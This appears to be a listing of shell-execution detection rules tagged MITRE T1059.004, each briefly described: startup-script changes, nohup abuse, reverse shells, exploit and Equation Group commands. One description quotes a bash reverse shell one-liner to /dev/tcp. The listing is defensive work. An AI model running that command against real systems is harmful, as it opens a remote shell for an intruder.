attack.t1059.004

Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.

Oct 17, 2023 · attack.execution attack.t1059.004 ·

Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments

Detects suspicious interactive bash as a parent to rather uncommon child processes

Aug 28, 2023 · attack.execution attack.t1059.004 ·

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Jun 26, 2023 · attack.execution attack.t1059.004 ·

Detects suspicious shell commands used in various exploit codes (see references)

Apr 21, 2023 · attack.execution attack.t1059.004 ·

Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.

Detects suspicious shell commands used in various Equation Group scripts and tools

Feb 1, 2023 · attack.execution attack.t1059.004 ·

Detects suspicious command sequence that JexBoss

Feb 1, 2023 · attack.execution attack.t1059.004 ·

Detects relevant commands often related to malware or hacking activity

Feb 1, 2023 · attack.execution attack.t1059.004 ·

Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell